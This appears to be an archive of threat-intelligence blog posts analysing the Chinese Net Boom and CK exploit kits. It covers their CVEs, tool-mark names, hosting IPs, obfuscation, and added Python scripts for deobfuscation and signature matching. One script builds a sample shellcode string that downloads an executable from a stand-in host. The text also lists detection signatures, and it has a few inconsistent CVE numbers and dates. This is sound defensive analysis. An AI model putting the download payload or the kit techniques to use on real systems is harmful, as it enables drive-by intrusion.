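The shellcode obfuscation described in this post (a padding string such as “cgTw” standing in for “%u”, then XOR BD over the decoded bytes) and in the later CK post above (“wm” in place of “%u”, and XOR 148 on the GUY2 sample) are the same two layers with different constants, and an analyst undoes them in the same order. The following Python is an added example, not the kit's own decoder: it restores the escapes, converts the %uXXXX code units to bytes, optionally strips a single-byte XOR, and pulls printable strings such as the payload URL and the download API name out of the result. The byte-wise XOR and little-endian code-unit layout are assumptions about how the kit's own decoder applies them; the sample payload, the sandbox.invalid URL and the padding tokens used here are constructed.

```python
"""Recover %u-escaped shellcode hidden by padding tokens and single-byte XOR.

Added example for this post (not the kit's own code). It reverses the two
layers described for the ZZ.HTML and ZIP/WIN.HTML samples: a padding token
("wm" or "cgTw") substituted for "%u", and a single-byte XOR applied to the
decoded bytes. The byte-wise XOR and little-endian code-unit order are
assumptions about how the kit's decoder applies them.
"""
import re
import struct

UNICODE_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})")

# Constructed sample shellcode-like payload: a NOP sled, an API name and a
# placeholder download URL, padded to an even length.
SAMPLE_PAYLOAD = b"\x90\x90URLDownloadToFileA http://sandbox.invalid/payload.exe\x00"


def restore_escapes(obfuscated, token):
    """Put the "%u" prefix back in place of the padding token."""
    return obfuscated.replace(token, "%u")


def unescape_units(escaped):
    """Turn %uXXXX escapes into bytes the way JavaScript unescape() lays
    them out in memory: each 16-bit unit little-endian. Also returns the
    unit count, the figure the post uses to compare sample sizes."""
    units = [int(m.group(1), 16) for m in UNICODE_ESCAPE.finditer(escaped)]
    return b"".join(struct.pack("<H", u) for u in units), len(units)


def xor_bytes(data, key):
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def deobfuscate(obfuscated, token, xor_key=None):
    """Return (raw_bytes, unit_count) for an obfuscated shellcode string."""
    raw, count = unescape_units(restore_escapes(obfuscated, token))
    if xor_key is not None:
        raw = xor_bytes(raw, xor_key)
    return raw, count


def extract_strings(data, min_len=6):
    """Printable ASCII runs, e.g. URLs and DLL or API names in shellcode."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def obfuscate(raw, token, xor_key=None):
    """Build constructed samples in the kit's format (inverse of deobfuscate)."""
    if xor_key is not None:
        raw = xor_bytes(raw, xor_key)
    if len(raw) % 2:
        raw += b"\x00"
    units = struct.unpack("<%dH" % (len(raw) // 2), raw)
    return "".join("%s%04x" % (token, u) for u in units)


if __name__ == "__main__":
    # The ZZ-style layer only: "wm" for "%u", no XOR.
    print(deobfuscate("wm4141wm4242", "wm"))
    # The ZIP/WIN-style layers: "cgTw" for "%u" plus XOR 0xBD.
    blob = obfuscate(SAMPLE_PAYLOAD, "cgTw", 0xBD)
    raw, count = deobfuscate(blob, "cgTw", 0xBD)
    print(count, extract_strings(raw))
```

For the GUY2 sample pass `xor_key=148` and the original "%u" text (token "%u" is a no-op); the unit count reported by `deobfuscate` is the number the post compares between the ZZ and GUY2 samples.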

CONCLUSIONS

By early 2013, exploits for JAVA vulnerability CVE-2012-4681, Flash vulnerability CVE-2012-1535 and MSIE vulnerabilities CVE-2012-1889 and CVE-2012-4969 were added to the CK Exploit Kit.  Exploits for MSIE CVE-2010-0806 and CVE-2012-0003 were removed from the package.  The exploits for JAVA CVE-2011-1344, Flash CVE-2012-0754, Flash CVE-2012-2140 and Flash CVE-2011-0611 were retained. Most of the new exploits have been in use by the CK kit since at least September 2012.  The new CVE-2012-4969 exploit was included since at least December 2012.

The kit continued to use variations of CK and CKWM in its file, variable and function names as seen in the samples discussed in this post.  The index page used CK.HTML as the file name and CKTTCYWAXX as a cookie value.  The new CVE-2012-4681 exploit included a JAR file named WMCK.JPG, a JAVA class named CVE2012XXXX.CKWMCC.CLASS, and variables named CKURL and WMCK.  The new CVE-2012-1535 exploit included a Flash file named WMCK.SWF. The new CVE-2012-1889 exploit included function and variables named CKABC, CKDEF, CKHGI, CKWMCKWM and CKCKCKCKCKCKCKCK.  Multiple exploits included the variable name CKABC and the padding strings /*ck vip*/, /*vip ck*/ or /*jsck vip*/.

The kit adopted new encryption techniques using the publicly available Tiny Encryption Algorithm (TEA) and new obfuscation techniques using the publicly available Dean Edwards Packer.  The kit also used Alexander Sotirov’s publicly available heap spray code. In one instance, exploits from the kit downloaded a Gh0st Remote Access Tool (RAT).  The Gh0st RAT communicated with the same IP that served the exploit files.

CK’s decrypted Java exploits include signatures associated with the Gongda Exploit Kit.  The HTML and source code for those Java exploits, however, are readily available on the web.  These offerings frequently retain references in the code associated with the Gongda Exploit Kit.  CK’s use of Dean Edward’s Packer alongside TEA Encryption is shared with the Kaixin Exploit Kit.  Both kits use the distinctive variable, AVgHbu2f,  to hold the value UNESCAPE.   I am not an expert on either the Gongda Exploit Kit or the Kaixin Exploit Kit, but I welcome any comments you may have about the similarities or dissimilarities of these kits.

REFERENCES

Previous posts for the CK Exploit Kit:

http://www.cysecta.com/2013/04/14/the-ck-exploit-kit-net-booms-metamorphosis/

http://www.cysecta.com/2013/03/30/the-last-net-boom-exploit-packs/

Open Source Tools References

Tiny Encryption Algorithm (TEA) with Base64 encoding

Dean Edwards Packer

JSBeautify

Alexander Sotirov’s JavaScript Heap Exploitation library

Data Sources:

Search Cache for *.*fj.gs.net.cm

wswm.0412game.com – JSUnpack

qichejiaodian.info – JSUNPack

Early Sample of Dean Edwards Packing - SEP 2012

Early sample of TEA Encryption – OCT 2012

Early Sample of CVE-2012-4186 – DEC 2012

Early Sample of CVE-2012-1535 – SEP 2012

Virustotal results for file WMCK.SWF (2012-1535)

down.3dianshi.com – Scumware

Gh0st Rat – ThreatExpert


The CK Exploit Kit – Net Boom’s Metamorphosis

The CK Exploit Kit

Evidence collected from network security traffic repositories revealed a Chinese exploit kit, CK, that was initially deployed in April 2012.  Analysis shows that it is a descendant of the Chinese Net Boom NB Exploiter kit described in my 23 February 2013 and 30 March 2013 posts.  The initial versions of the kit included a JAVA CVE-2011-3544 exploit, Flash CVE-2012-0611, CVE-2012-2140 and CVE-2012-0754 exploits, and MSIE CVE-2010-0806 and CVE-2012-0003 exploits.  The latest version of the kit, observed March 2013, probably included JAVA 2012-4681 and CVE-2011-3544 exploits, Flash CVE-2011-0611, CVE-2011-2140, CVE-2012-0754 and CVE-2012-1535 exploits, and MSIE CVE-2012-1889 and CVE-2012-4969 exploits.

The CK Exploit Kit has received some limited attention, primarily from Korean security bloggers.  On 14 February 2013, Korean blogger Sea (바다란) described how a compromised Japanese web site (cnblue.jp) for a popular Korean rock band was directing visitors to malware that was generated by the CK kit.  On 28 March 2013 a Korean blog, Hakawati Security Labs, described CK deobfuscation.  Little additional information about the kit is available.  The purpose of this post is to investigate the origins of the CK Exploit kit to determine how it may have been deployed in the recent past.

Early 2012 CK Exploit Kits

Exploit packs generated from the CK Exploit kit began to replace packs from the Net Boom kit in April 2012.   A good example of this transformation can be seen in network security traffic repositories for the IP address 61.159.225.18.  Domains resolving to 61.159.225.18 were serving exploit packs generated from the Korean language release of the Net Boom NB Exploiter version 2.8.4.6 in April and May.  Details about Net Boom version 2.8.4.6 are available in my 30 March 2013 post.  By late May, 61.159.225.18 had replaced the Net Boom packs with CK exploit packs.  The same CK packs were also observed in early 2013 on several other, mostly Chinese, sites listed below.

58.221.31.149 (CN)
60.190.172.187 (CN)
61.155.154.117 (CN)
61.159.225.18 (CN)
67.198.173.122 (US)
112.213.109.89 (HK)
113.107.95.66 (CN)
121.12.169.152 (CN)
180.153.98.34 (CN)
218.65.30.10 (CN)
218.95.39.55 (CN)
218.95.38.89 (CN)
222.186.52.116 (CN)

The first CK Exploit packs included a JAVA CVE-2011-3544 exploit, Flash CVE-2012-0611, CVE-2012-2140 and CVE-2012-0754 exploits, and MSIE CVE-2010-0806 and CVE-2012-0003 exploits.  The Java exploit was found on the landing page.  It was encrypted using an open source Tiny Encryption Algorithm (TEA) and packed using the open source Dean Edward’s Packer.  The code used to detect the Java version (TOP.JS) is based on Oracle’s DEPLOYJAVA script. If the victim browser did not meet the criteria for the Java exploit, it was directed to file 1.HTML to be evaluated for one of the three Flash exploits.  If the victim browser did not meet the criteria for one of the Flash exploits, it was directed to one of the two MSIE exploits.  The files and logic behind the initial CK packs are shown below.

[Image: CKPack032013]

File names CK.SWF and CK.MID are obvious references to the CK Exploit kit.  CKWM.JPG and CKWM.SWF are probably abbreviations for Chinese Pinyin “CK Wǎng mǎ” which translates to “CK Network Trojan”.  The file names may also reflect the web site name CKWM.NET which appears to be associated with the CK Exploit kit.  Several other variations of CK and CKWM can be seen in the variable names and function names used by the exploit code.  A few examples are CKWM, CKWMX, CKCODE and CK0.  Some other noteworthy variable and function names from the landing page include POLO, COLO, OSOME and NAVER.  A few noteworthy names from the main Flash exploit page include APPLE and NOKIA.


Links to Net Boom NB Exploiter

Much of the code in the new CK landing page was dedicated to decrypting the CVE-2011-3544 exploit code and detecting the browser Java version.  Stripped of all of the code relating to the new CVE-2011-3544 exploit, the landing page looks very similar to the old Net Boom landing pages.  The variables named POLO, COLO, OSOME and the function name NAVER were retained from Net Boom as seen in the following two code fragments from IP 61.159.225.18 in early 2012.  Note that the Net Boom variable NBSUN was changed to CKWM8.  Additionally, both sets of landing pages used web statistics generated from 51yes.com.

CK-NBIndex

Flash files NB.SWF for CVE-2011-0611 and NBWM.SWF for CVE-2011-2140 were replaced by file names CK.SWF and CKWM.SWF, respectively. These changes can be seen in the file 1.HTML – a file used by both packs to match a victim browser with an appropriate Flash exploit.  The CK version appears to be a modified copy of the older Net Boom version of 1.HTML as shown below:

CK-NB1html

The CK file OOP.HTML for CVE-2011-0611 was obfuscated using a bitwise OR with a decimal value of eight. After de-obfuscation, it is clear that the CK CVE-2011-0611 exploit was taken from code generated by Net Boom NB Exploiter. The authors made a few efforts to associate the old code with the new CK Exploit kit. The variable name CKWM in OOP.HTML replaced the variable name NETBOOM. The variable name CKCODE replaced the variable name NBCODE. The function name NB() was replaced by the function name CK0(). The reference to file NB.SWF was replaced with a reference to file CK.SWF. Some old Net Boom references such as NB, NBWM, NBPOWER and NBLOL, however, remained in the code as shown below.

oop

The CK exploit code for CVE-2010-0806 is nearly identical to the Net Boom NB Exploiter version 2.8.4.6 exploit code for CVE-2010-0806. The files P1.JS, P2.JS, P3.JS, P4.JS and P5.JS called by POP.HTML in the CK version of the CVE-2010-0806 exploit are nearly identical to the files I1.JS, I2.JS, I3.JS, I4.JS and I5.JS called by IE6.HTML in the Net Boom version of the exploit described in my 30 March 2013 post.

pop

popjs

Conclusions:

The analysis presented in this post provides evidence supporting the idea that the Net Boom Exploit kit was transformed into a new kit named CK Exploit in early 2013. The last deployment of NB Exploiter version 2.8.4.6 ended in March 2012. Vestiges of NB Exploiter version 2.8.4.6, however, were clearly visible in the new kit named CK Exploit.

One of the most interesting things about Net Boom's NB Exploiter version 2.8.4.6 was the fact that it was a Chinese product available with Korean language support and could be bundled with DDOS applications. If CK Exploit is, in fact, the descendant of NB Exploiter version 2.8.4.6, then it would be reasonable to expect that a Korean language version of CK Exploit with integrated DDOS applications exists as well. I think that a hypothesis worthy of exploration is that the CK Exploit kit may have played a role in the March 2013 cyber attacks against South Korea.

References:

CN Blue Japanese website Serving Malware  http://p4ssion.com/341

CK VIP Deofuscation http://hidka.tistory.com/entry/CK-VIP-Deofuscation

Clean-mx.de results for IP 66.174.244.154 http://support.clean-mx.de/clean-mx/viruses.php?ip=66.147.244.154&sort=first%20desc

Net Boom Landing Page, Early 2012 http://jsunpack.jeek.org/dec/go?report=ef593039e29ba9c2105d7abc603cda5f14025426

CK Landing Page, May 2012 http://jsunpack.jeek.org/img/?report=a45ac6cff1e131319250833e662f3c2ff139ac64

The Last Net Boom Exploit Packs

Net Boom NB Exploiter is an exploit kit that was produced between 2010 and 2011. My post "Net Boom Kits and Signatures" from 23 February 2013 provides details about the kit, the web sites that distributed the kit, and the Chinese and Korean versions of the kit. The last known Net Boom Exploit Kit was the Korean language NB Exploiter Version 2.8.4.6. Version 2.8.4.6 offered nine different exploits for vulnerabilities including CVE-2010-0806 (MS10-018), CVE-2010-3962 (IE CSS), CVE-2011-1255 (MS11-050), CVE-2011-0611 (Flash 10.2.153), CVE-2011-2110 (Flash 10.3.181) and CVE-2011-2140 (Flash 10.3 0day). A screen shot of the Korean language NB Exploiter Version 2.8.4.6 is shown below:

NBEv2.8.4.6

The kit provided an option to deploy a package of exploits using code to determine which exploit was best suited for a given victim’s configuration.  I believe that there will be some value in examining the exploit code with a particular emphasis on the logic that determines which exploit in the package gets served to the victim.  Examining these files may help to determine tactics, techniques and procedures (TTP) unique to the authors or users of Net Boom exploits.

The default package, as displayed on the user interface, included CVE-2010-0806, CVE-2011-0611, CVE-2011-2110 and CVE-2011-2140. Unfortunately, I could not obtain a copy of NB Exploiter 2.8.4.6 to generate the code associated with the package. This default package, as well as some variations that include CVE-2010-3962 and CVE-2011-1255, can be found, however, in security archives by searching for unique file names, variable names, function names and padding strings associated with Net Boom's code. Some examples of these names are listed below:

NETBOOM.HTML, NB.HTML, NB.JS, NB.SWF, NBWM.SWF, NET BOOM, NBOOM, NBWANGMA, NBWM

Given the release dates of the advisories and the discovery dates of the Net Boom samples in the wild, I think it is safe to say that NB Exploiter Version 2.8.4.6 was not released until about October or November of 2011. By late 2011 to early 2012, all of the IE and Flash exploits listed on the interface of NB Exploiter Version 2.8.4.6 could be found deployed as integrated packages in the wild.  Clean-mx.de and Jsunpack.jeek.org queries for 61.159.225.18 provide good examples of a complete Net Boom pack as described below:

Nbpack3

On 20 January 2012, j53s.js6.in/401/ww/ht.html was the landing page for exploits served from IP 61.159.225.18. The landing page led to IE exploits CVE-2010-0806, CVE-2010-3962 and CVE-2011-1255, and Flash exploits CVE-2011-0611, CVE-2011-2110 and CVE-2011-2140.

ht

The three IE exploits were delivered by IE6.HTML, CE.HTML and YY.HTML. The CVE-2010-0806 exploit was contained in files named IE6.HTML, 1.JS, 2.JS, 3.JS, 4.JS, 5.JS and 6.JS. The CVE-2010-3962 exploit was included in files named CE.HTML, CEO1.JS, CEO2.JS, CEO3.JS, CEO4.JS and CEO5.JS. CEO4.JS contained the trigger for the CVE-2010-3962 exploit. The CVE-2011-1255 exploit was delivered by files named YY.HTML, Y1.JS and Y2.JS.

The three Flash exploits were implemented using the following files. File 1.HTML determined which exploit would be served to the victim browser based on the Flash version and the browser type and version. The CVE-2011-0611 exploit was contained in 2.HTML and NB.SWF. The CVE-2011-2110 exploit was contained in 3.HTML. The CVE-2011-2140 exploit was contained in NBWM.SWF and called directly from 1.HTML.

1

File 1.HTML called NB.JS in order to determine the version of Flash used by the victim’s browser.  File NB.JS was a modified copy of SWFObject Version 1.5.1 – an Open Source tool for Flash Player detection and embedding Flash content into web pages.

nbjs-1

In some other samples, the authors of the exploit kit modified the first line of the code to replace the URL for the author’s site with the string NETBOOM as shown below:

nbjs-2

In addition to the file names NB.JS, NB.SWF and NBWM.SWF for the Flash exploits, some other references to Net Boom are found in the 1.HTML variable names NBMM and NBGG. Numerous other references are included in the IE exploit code for CVE-2010-0806, CVE-2010-3962 and CVE-2011-1255. The CVE-2010-0806 exploit used NBYEAH, NBMMM, NBMS and NBOOM.

0806

The variations of Net Boom and NB Exploiter in the CVE-2010-3962 exploit included NBMWHAHA, NBWMXIXI, NBA, NBREPLAY, NBGUAI, NBMAO, NBLONG, NBTOYOTA and NBSTR0.

3962

The CVE-2011-1255 exploit included a function named NBWM().

1255

Conclusions:

Net Boom NB Exploiter version 2.8.4.6 appears to be the last version of the Net Boom kit.  Version 2.8.4.6 may have been released as early as October 2011.  Exploit packages most likely generated from NB Exploiter version 2.8.4.6 were deployed between November 2011 and March 2012.  These packs included links to tracking sites such as 51YES.com, code for checking and setting cookies on the victim machines, and logic for determining the optimal Flash or IE exploit for a given victim browser configuration.

Deployments of these complete exploit packages from NB Exploiter version 2.8.4.6 ended in March 2012, but vestiges of these packages live on in other, more recent exploit kits. The CVE-2011-0611 exploit code, complete with flagrant references to Net Boom, was observed in conjunction with the Zhi-Zhu (Spider) exploit pack. An example of this kind of hybrid was seen in 51767.com/data/pub/tlbbn.html in July 2012. Generally, the two packs used the same exploits excepting CVE-2012-0003. Could Zhi-Zhu Pack be an updated version of Net Boom NB Exploiter version 2.8.4.6?

Net Boom landing pages, such as HT.HTML or MD.HTML, are very similar to the YG.HTML file used by the Yang Pack as described by the Kahu Security blog on 12 January 2012. The file in Net Boom's pack for determining which Flash exploit to use, 1.HTML, is very similar to the file T.HTML used in the Yang pack. Also, both files use the open source script SWFObject 1.5.1 for determining the victim's version of Flash. A main difference between the two packs is that Yang Pack, like other more recent Chinese exploit packs, included a CVE-2011-3544 exploit, but Net Boom did not. Could Yang Pack somehow link Net Boom with more recent packs seen in 2012 and 2013? The questions about the relationship between Net Boom, Zhi-Zhu Pack and Yang Pack deserve more attention than I can give them here.

To end this post, it is worth mentioning that much of the data I examined suggested that the Net Boom kit evolved into a new exploit kit not previously documented by the security community, called CK Exploit. Like Net Boom, Silver Fox and Anhey, the CK Exploit Kit has its own web site. Around April 2012, sites that had been serving Net Boom exploits began changing Net Boom associated file names and variable names to CK associated file names and variable names. For example, the file NB.SWF that implemented a CVE-2011-0611 exploit changed to CK.SWF. The file NBWM.SWF that implemented a CVE-2011-2140 exploit changed to CKWM.SWF. Once again, the evidence suggesting the existence of the CK Exploit kit deserves more attention than I can give it in this post.

REFERENCES:

Korean Security Research Blog (http://kjcc2.tistory.com/1286)

CVE-2011-0611 (http://www.adobe.com/support/security/advisories/apsa11-02.htm)

CVE-2011-2110 (http://www.adobe.com/support/security/bulletins/apsb11-18.html)

CVE-2011-2140 (http://www.adobe.com/support/security/bulletins/apsb11-21.html)

Complete Kit (http://62.67.194.183/clean-mx/viruses.php?ip=61.159.225.18)(http://209.9.239.101/dec/go?report=de19f6015fad956fb72c82b96c0331a680060cd2 http://jsunpack.jeek.org/dec/goreport=0462312cf5e6be164677a4c9b5700c9df9cd5a74)

Flash Detection (http://blog.deconcept.com/swfobject/)(http://jsunpack.jeek.org/dec/goreport=7472f13441ddad502f2e4014c6a20bdfb6d7a087)

Zhi-Zhu Pack (http://www.kahusecurity.com/2012/another-chinese-pack/)

Yang Pack (http://www.kahusecurity.com/2012/chinese-exploit-packs/)

Net Boom Kits and Signatures

Introducing Net Boom

Net Boom is an exploit kit that was produced between 2010 and 2011.  The Net Boom Software Group used the web site 1874.cc for sales and support.  According to 1874.cc, Net Boom NB Version 1.0.1 was released on 28 April 2010 and  was released again on 10 May 2010.   Another version named NB Exploiter Version 1.0.0.1, was created in late November of 2010.  Net Boom’s NB Exploiter 2011 Version 2.0.1.1 was produced in January of 2011. The Net Boom authors also released single exploit kits for at least an IE 0-Day vulnerability, a Flash 0-Day vulnerability and a Flash Version 10.3 vulnerability.   The 1874.cc website is no longer active.  A 26 June 2011 screen shot of the site from dawhois.com is reproduced below.  Images of their products are included at the bottom of the 1874.cc page.

1874_cc

The Net Boom Software Group also developed Korean and English language versions of the Net Boom kits that were probably sold and serviced through the website s-shark.com. Both the Korean and English language versions, however, retained references to 1874.cc. The Korean language Net Boom kits were packaged with the Net Bot Distributed Denial of Service (DDOS) attack software that also originated from China. The Korean NB Exploiter Version 2.8.4.6 and a single-exploit kit for a Flash 10.3 vulnerability were released some time in 2011 and are shown in the graphic for s-shark.com. Evidence in VirusTotal reveals an English language version of the Net Boom NB Exploiter 1.0.0.1. A screen shot of s-shark.com products is shown below. The image is from a Korean language security research blog post available here.

s-shark_com_20111107_134423

The security researchers investigating the S-Shark product offerings found what appears to be a 2011 English language version of an unspecified single exploit kit. A screenshot of another unspecified 2011 single Flash 0-Day exploit Net Boom kit has been available on a Chinese language hacker site since November 2011. This Chinese language kit looks very similar to the English language single exploit kit.

NetBoom111820yn0qxsp5g00h0wth

Another single exploit kit for CVE-2011-0611 and an unspecified NB exploit kit were reported by Kahu Security's Blog in their 22 April 2011 post entitled "Flash 0Day Found in Drive-By". The author redacted the name and version of the kits from the graphics. The references to Net Boom in the code fragments, or tool marks as described by the author, reveal that a Net Boom kit was the source of the CVE-2011-0611 exploit described in the post. The types of references included in the code are described in more detail in the following paragraphs.

2011-04-22_07

2011-04-22_08

A Quick Look at a Few of the Kits

NB Exploiter Version 1.0.0.1 and NB Exploiter 2011 Version 2.0.1.1 are available for download on several Chinese language hacker sites. Net Boom NB Exploiter Version 1.0.0.1 offers six different exploits and a package of exploits for Flash 9, Flash 10 and MS Office. The packaged exploits were MS Office (CVE-2009-1136), a MS MPEG-3 exploit, MS10-002 (CVE-2010-0249), MS10-018 (CVE-2010-0806), Flash 10 (CVE-2009-1862) and Flash 0Day (CVE-2010-1297).

NB Exploiter Version 2.0.1.1 was significantly different from Version 1.0.0.1 in appearance and content. The code generated in this version lacks much of the script fragmentation, obfuscation and distinctive variable naming conventions found in the previous version. Version 2.0.1.1 generated 31 exploits ranging from MS06-16 to more recent well-known and obscure exploits including the following: Flash 10.0.32 (CVE-2010-1297), an Apple Safari 4.0.5 exploit, Shockwave Player 11 (CVE-2010-3653), Adobe SVG Viewer MS10-081 (CVE-2010-2746), two IE MS10-090 exploits (CVE-2010-3962), an Advanced File Vault exploit, a Trend Micro 2010 exploit, a Net-Craft Tool Bar exploit, a MS11-XXX 0-Day exploit (IE CSS MS11-003, CVE-2010-3971), a WMI-Tools exploit (CVE-2010-3973), and a Real-Player 0-Day exploit (CVE-2010-3749). It is unclear why Version 2.0.1.1 was so different from both the original version and the subsequent version. Subsequent versions were probably more similar to Version 1.0.0.1 than to Version 2.0.1.1.

Comment lines inside the code for the Version 2.0.1.1 Net-Craft Tool Bar exploit included lyrics from the KC and the Sunshine Band 1975 hit single "Get Down Tonight". The comments claimed authorship by the 1874.cc Software Group. The authors appear to be fans of 1970s era Western disco in addition to possessing English language skills.

The Korean language NB Exploiter Version 2.8.4.6 offers nine different exploits and a package for CVE-2010-0806, Flash 10.2, Flash 10.3 and an unspecified Flash 0-day exploit. Version 2.8.4.6 single exploits included MS Office (likely CVE-2009-1136), MS10-018 (CVE-2010-0806), IE CSS (likely CVE-2010-3971), Flash 10.2.153 (likely CVE-2011-0611), Flash 10.3.181.23 (likely CVE-2011-2110), an unspecified Flash 10.3 0-Day, an unspecified Firefox 3.6 0-Day, and a Real-Player 14 exploit. The appearance of the user interface is much more similar to Version 1.0.0.1 than it is to Version 2.0.1.1. Screen shots of all three versions are provided below.

NBExploiter201

netBoom2010

NBEv2.8.4.6

Based on traffic analysis, it is likely that the Flash 0-Day exploit works against CVE-2011-2140 using a file named NBWM.SWF. This conclusion is supported by analysis of the code fragments in Kahu Security's 11 November 2011 post, "CVE-2011-2140 Caught in the Wild". The reasoning behind this type of analysis is described in the following paragraphs.

Net Boom Signatures

A closer look at the exploit code reveals the origins of Net Boom and the distinctive file naming and variable naming conventions that can be used to identify Net Boom exploits in archived network traffic. By building a robust set of distinctive signatures, it may be possible to follow the evolution of the Net Boom kits well beyond the mid-2011 versions currently available.

Version 1.0 packages exploits for MS Office and Flash into the files 1.HTM, 2.HTM, NB.HTML, NB2.HTM, NETBOOM.HTML and NF9.HTM. The Flash 9 exploit included files selected from I115.SWF, I47.SWF, I45.SWF, I64.SWF, F115.SWF, F47.SWF, F45.SWF, and F64.SWF. The Flash 10 exploit used files NF10.HTM and FA.HTM. File NB.HTML included a placeholder for the statistical code. The package contains decision-making algorithms for identifying the optimal exploit for a given victim. NETBOOM.HTML and NF9.HTM contained conditional statements based on browser types and versions. NB2.HTM, 1.HTM and 2.HTM implemented the exploits. The files generated for the other six single exploits are listed below:

MS Office (CVE-2009-1136):  OF.HTM, QCC.JPG and UBBI.JPG

MS MPEG-3: BB.JPG, BB1.JPG, BBBB.JPG, BBBB1.JPG, BBBBB.JPG, UBB.JPG and MP.HTML

MS10-002 (CVE-2010-0249): MS~10002.HTM, PATY.JS and HaspxcSWmblWluWORuCKy.GIF

MS10-018 (CVE-2010-0806): X6.HTM, X7.HTM, NB.JS, NB.JS, NB.JS, A.JPG, B.JPG, C.JPG and D.JPG

Flash 10 (CVE-2009-1862):  IE.HTM, NF10.HTM, FF.HTML, IE.JS, IF.JS, FF.JS and XP.SWF

Flash 0-Day (CVE-2010-1297): FA.HTML and NB.SWF

The NB Exploiter Version 1.0.0.1 exploits are very similar to the Silver Fox and Anhey Kit exploits. Much of the NB Exploiter code appears to have been copied directly from the Silver Fox or Anhey exploit kits. Consequently, many of the file names and variable names found in the code can also be found in the older kits. To distinguish the new Net Boom file and variable names from the older Anhey and Silver Fox file and variable names, I have italicized the older names and underlined the new Net Boom names in the list below:

Exploit Package Files: SVFOXMM, SVFOXWW

MS Office (CVE-2009-1136):  YINHU, YINHUKING, YINHUMM, YINHUGG, YHWMYHWM, YHWM2, YHWM2, YHWM6, SSVVSVSV, SVSVSVSVSVSV, SVANTI, SVCNN, CCKKL, NB00-NB27

MS MPEG-3: SILVERFOX, SILVERFOXWM, SILVERFOXFMY, SFWMSFWMSFWM, SILVERCOLOR, SILVERCOLORFOX, SFQQQ, FOXMM, FOXGG, FOXBB, FOXYY, FANGPIJIUCHOU, SUNSHINE, MONEY, YHHAOYUN, NB00-NB27

MS10-002 (CVE-2010-0249): SSS, CC, WMAHWM, OAH, OAHO, LHAH, HHAH, SSAH, SHIT, HUA, HUA1, HUA2, HUA3, HUA4, HaspxcSWmblWluWORuCKy

MS10-018 (CVE-2010-0806): SVFOX, SVFOXNET, YINHUWAGMA, ANHEIWAGMA, AHWMNIUX, ANHEYSIZE, AHEYOK, ANHEINOP, ANHEYANYWAYALRIGHT, ANHEYANYWAYOK, ONLYANHEIWMUP, WOAIANHEYWM, SUN, NB.WM, NBWANGMA

Flash 10 (CVE-2009-1862):  PARAM NAME=”MOVIE” VALUE=”DONE.SWF”, EMBED SRC=”XP.SWF”, SSS, QVISI=”YOU”, IFMY,  XP.SWF

Flash 0Day (CVE-2010-1297): NB, BB, EMBED SRC=’NB.SWF’

References to the Anhey kit include the phonetic representations of "暗黑", ANHEY or ANHEI, or the abbreviation AH. References to the Silver Fox Exploit Kit include variations such as SVFOX or SF, and the phonetic representation of "银狐", YINHU, or YH. References to the Net Boom NB Exploiter Kit include variations of NETBOOM or the abbreviation NB. References to any of the three kits may be joined to WANGMA or its abbreviation WM. WANGMA is a phonetic representation of "网马", which translates to Network Trojan.

The Net Boom kit included a set of instructions for injecting the exploit code into third party websites. Nearly identical instructions were found in the Anhey and Silver Fox Exploit Kits. Additionally, the Net Boom, Silver Fox, and Anhey Kits all used the same third party Skin++ library for the user interface.

Consistent use of code fragmentation to evade detection, the presence of shared shellcode fragments in the exploit code, the use of XOR 0xBD encoding, the use of similar obfuscation methods, the practice of using variations of the product name as variable names, the existence of references to multiple exploit kit names in a single file, and the use of the same 2009 Skin++ library DLL file indicate that these three kits may share a single author. For more detail on the Silver Fox Exploit kit, please read my 17 February 2013 post, Silver Fox Galleries. For more details on the Anhey Exploit Kit, please read my 07 February 2013 post, Anhey Menagerie.

In addition to the terms NETBOOM.HTML, NB.HTML, NB.JS, NB.SWF, NBWANGMA, NBWM and NB discussed above, one can find several other very likely Net Boom traffic signatures by searching through security repositories such as JSUNPACK, WEPAWET and Clean-MX. Some very likely terms recovered from these sources include the following:

NB.EXE, NB.JS, NB6.SWF, NB8.SWF, NBWM.SWF, NBWM(), NB(), NETBOOM, NETBOOM00, NBBOOM, NBOMM, NBA, NBAA, NBBB, NBCC, NBCODE, NBCODING, NBGG, NBGUAI, NBKING, NBLOL, NBLONG, NBLUCK, NBMAO, NBM, NBMM, NBNB, NBNOP, NBOORPK, NBRPK, NBPOWER, NBREPLAY, NBSENDING, NBSIZE, NBSS, NBTIME, NBSTR, NBSUN, NBTOYTA, NBVIVI, NBWMA, NBWMHAHA, NBWMYO, NBWMX, NBWMXIXI, NBX, NBYEAH, NBZF, NB14093, NB818588, NB818599, NB860488, NB98748
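The tool-mark lists above can be used directly as a triage signature set. The following script is an added example written for this post's material, not code from any of the kits or from a security repository: it tokenizes a page sample, normalizes identifiers and file names to upper case, and scores them against vocabularies taken from the Net Boom, Silver Fox, Anhey and CK names listed on this page, plus a few prefix patterns (NB followed by digits, FOX00-FOX27 style counters, and kit names joined to WM or WANGMA). The HTML fragments it scans are constructed for the demonstration, and the `min_hits` threshold is an assumption chosen so that a single stray token does not attribute a page by itself.

```python
import re
from typing import Dict, List, Optional, Set

# Exact tool marks (identifiers and file names) drawn from the signature
# lists in this post, grouped by the kit they point to.
KIT_TOKENS: Dict[str, Set[str]] = {
    "Net Boom": {
        "NETBOOM", "NETBOOM00", "NBOOM", "NBWANGMA", "NBWM", "NBCODE", "NBCODING",
        "NBGG", "NBMM", "NBSUN", "NBPOWER", "NBLOL", "NBYEAH", "NBMS", "NBGUAI",
        "NBMAO", "NBLONG", "NBREPLAY", "NBSTR", "NBSTR0", "NBTOYOTA", "NBWMXIXI",
        "NBWMHAHA", "NBSIZE", "NBNOP", "NBKING", "NBLUCK",
        "NETBOOM.HTML", "NB.HTML", "NB.JS", "NB.SWF", "NBWM.SWF", "NB6.SWF",
        "NB8.SWF", "NB.EXE",
    },
    "Silver Fox": {
        "SILVERFOX", "SILVERFOXWM", "SVFOX", "SVFOXNET", "SVFOXWM", "SFWM",
        "YINHU", "YINHUWANGMA", "YINHUWAGMA", "YHWM", "SVFOXCODE",
        "SILVER.HTM", "FOX.HTM", "SVF.HTM", "SVX.HTM", "SVF10.HTM",
        "SVFFOX.HTM", "SVFOX.HTM", "IFOX.JS", "IFOX2.JS", "IFOX3.JS",
    },
    "Anhey": {
        "ANHEY", "ANHEI", "ANHEIWAGMA", "AHWMNIUX", "ANHEYSIZE", "AHEYOK",
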